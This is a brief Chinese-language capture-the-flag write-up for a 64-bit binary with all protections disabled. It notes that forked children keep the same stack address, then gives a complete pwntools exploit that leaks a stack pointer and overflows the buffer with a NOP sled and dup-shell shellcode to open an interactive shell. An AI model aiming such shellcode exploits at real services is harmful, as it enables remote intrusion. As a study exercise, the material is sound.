最近想多看看题目积累些经验,
--------
程序分析
64位,保护措施都没开
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : disabled
PIE : disabled
RELRO : Partial
只是利用过程还饶了下,简单说下利用的几个点
1 通过fork生成的子进程的栈地址是不变的,所以这道题中可以使用先泄露出来的内存
2 函数中连续调用了memcpy strcpy,注意仔细分析具体细节
--------
from pwn import * context(os='linux', arch='amd64')
#context.log_level = 'debug' p = remote('127.0.0.1', 6666) p.sendlineafter('\x00', 'arsenal')
p.sendlineafter('\x00', 'gyeongbokgung')
p.sendlineafter('\x00', 'psy') p.recvuntil('\x00') log.info('communicate complete') p.sendline('a' + '\x00'*7)
leak_stack = u64(p.recvuntil('\xff\x7f')[-6:] + '\x00\x00') p.recvrepeat(2) p.close() log.info('get some info ' + hex(leak_stack)) r = remote('127.0.0.1', 6666) r.sendlineafter('\x00', 'arsenal')
r.sendlineafter('\x00', 'gyeongbokgung')
r.sendlineafter('\x00', 'psy') r.recvuntil('\x00') log.info('communicate complete') buf_0x10 = 0x7fff10e2dcd0
leak = 0x7fff10e2dd50 buf_addr = leak_stack + (buf_0x10 - leak)
#raw_input()
offset = 0x10
pad = asm(shellcraft.nop())
buf = pad * offset + asm(shellcraft.dupsh(4))
buf += pad * (0x110-8-len(buf)) + p64(buf_addr) r.sendline(buf) r.interactive()